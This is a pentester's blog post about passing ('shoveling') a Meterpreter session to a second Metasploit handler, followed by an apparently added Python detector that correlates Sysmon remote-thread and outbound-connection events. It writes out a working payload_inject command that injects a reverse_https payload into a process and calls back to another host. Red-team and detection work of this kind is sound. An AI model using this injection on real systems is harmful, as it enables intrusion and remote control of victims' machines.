Every day I'm Shovelin'

The other day I had a Meterpreter shell on a box and, for some reason, my attempts at shoveling the shell to another host were not working. It turned out the customer had located the malicious payload and killed it, but it made me question whether my technique was working properly or not. I decided to head into the lab to take a look.

First, I got a Meterpreter shell on my Windows host. (My shell is using reverse_https on port 8443.)


Next, I opened up a multi/handler in Metasploit on a different Kali box. This is where I want to send my shell. At first I attempted to use the same port (8443) and found that Metasploit does not like that, so I used port 8444 instead.


I then went back to my Meterpreter shell and ran the following command [1]:

run post/windows/manage/payload_inject PAYLOAD=windows/meterpreter/reverse_https,LHOST=192.168.108.22,LPORT=8444,HANDLER=false,OPTIONS='SessionCommunicationTimeout=0,SessionExpirationTimeout=0,PID=3384'


*NOTE: The HANDLER option starts a multi/handler on your own system so you don't have to start one in another terminal. This is only useful if you are shoveling shells back to your own system to gain multiple Meterpreter sessions; since the handler here lives on a different box, it is set to false.

Once I issued this command, a Meterpreter session opened up on my other box! AWESOME!
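From the defender's side, the thing the customer's team caught above is the trace this move leaves on the host: payload_inject writes the new stager into an existing process (the PID given in OPTIONS) and that process then opens a fresh outbound connection to the new LHOST/LPORT. The following is an added example, not code from the original post or from Metasploit, that correlates constructed Sysmon-style records (Event ID 8 CreateRemoteThread followed by Event ID 3 NetworkConnect from the same PID) to flag that pattern. The PIDs, timestamps and the unrelated decoy events are assumptions; the 192.168.108.22:8444 destination mirrors the LHOST/LPORT used in the post.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class Event:
    """One Sysmon-style record: timestamp, event ID and its named fields."""
    ts: datetime
    event_id: int      # 8 = CreateRemoteThread, 3 = NetworkConnect
    fields: dict


# Constructed sample log. PID 2212 is assumed to be the process hosting the
# first Meterpreter session; PID 3384 is the injection target from the post.
T0 = datetime(2024, 1, 1, 12, 0, 0)
SAMPLE_EVENTS = [
    # original session beaconing to the first handler (constructed IP)
    Event(T0, 3, {"ProcessId": 2212, "Image": "C:\\Windows\\System32\\notepad.exe",
                  "DestinationIp": "192.168.108.10", "DestinationPort": 8443,
                  "Initiated": "true"}),
    # payload_inject: remote thread created in PID 3384 from the session's process
    Event(T0 + timedelta(seconds=10), 8,
          {"SourceProcessId": 2212, "SourceImage": "C:\\Windows\\System32\\notepad.exe",
           "TargetProcessId": 3384, "TargetImage": "C:\\Windows\\explorer.exe"}),
    # the injected stager calls out to the second handler shortly afterwards
    Event(T0 + timedelta(seconds=12), 3,
          {"ProcessId": 3384, "Image": "C:\\Windows\\explorer.exe",
           "DestinationIp": "192.168.108.22", "DestinationPort": 8444,
           "Initiated": "true"}),
    # unrelated browsing from another process: must not alert
    Event(T0 + timedelta(seconds=13), 3,
          {"ProcessId": 4100, "Image": "C:\\Program Files\\Browser\\browser.exe",
           "DestinationIp": "10.0.0.5", "DestinationPort": 443, "Initiated": "true"}),
    # a remote thread with no follow-up connection (e.g. a debugger): must not alert
    Event(T0 + timedelta(seconds=20), 8,
          {"SourceProcessId": 5000, "SourceImage": "C:\\Tools\\debugger.exe",
           "TargetProcessId": 5001, "TargetImage": "C:\\Tools\\app.exe"}),
]


def correlate(events, window=timedelta(seconds=60)):
    """Return an alert for every CreateRemoteThread whose target PID initiates
    an outbound connection within `window` after the injection."""
    ordered = sorted(events, key=lambda e: e.ts)
    injections = [e for e in ordered if e.event_id == 8]
    connects = [e for e in ordered
                if e.event_id == 3 and e.fields.get("Initiated") == "true"]
    alerts = []
    for inj in injections:
        target = inj.fields["TargetProcessId"]
        for conn in connects:
            if (conn.fields["ProcessId"] == target
                    and inj.ts <= conn.ts <= inj.ts + window):
                alerts.append({
                    "pid": target,
                    "image": conn.fields["Image"],
                    "injected_by": inj.fields["SourceProcessId"],
                    "dest": (conn.fields["DestinationIp"], conn.fields["DestinationPort"]),
                    "delay_s": (conn.ts - inj.ts).total_seconds(),
                })
    return alerts


if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(f"ALERT pid={a['pid']} ({a['image']}) injected by pid={a['injected_by']} "
              f"-> {a['dest'][0]}:{a['dest'][1]} after {a['delay_s']:.0f}s")
```

The window is deliberately short: the injected stager connects back almost immediately, and a long window would drag in ordinary activity from any process that legitimately receives remote threads. Note that HANDLER=false changes nothing on the victim; the host-side pattern is identical whether the new handler sits on the attacker's original box or a second one.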


Hope this helps when you are shovelin' shells!



[1] - http://www.darkoperator.com/blog/2011/12/16/injecting-payloads-into-memory-meterpreter.html
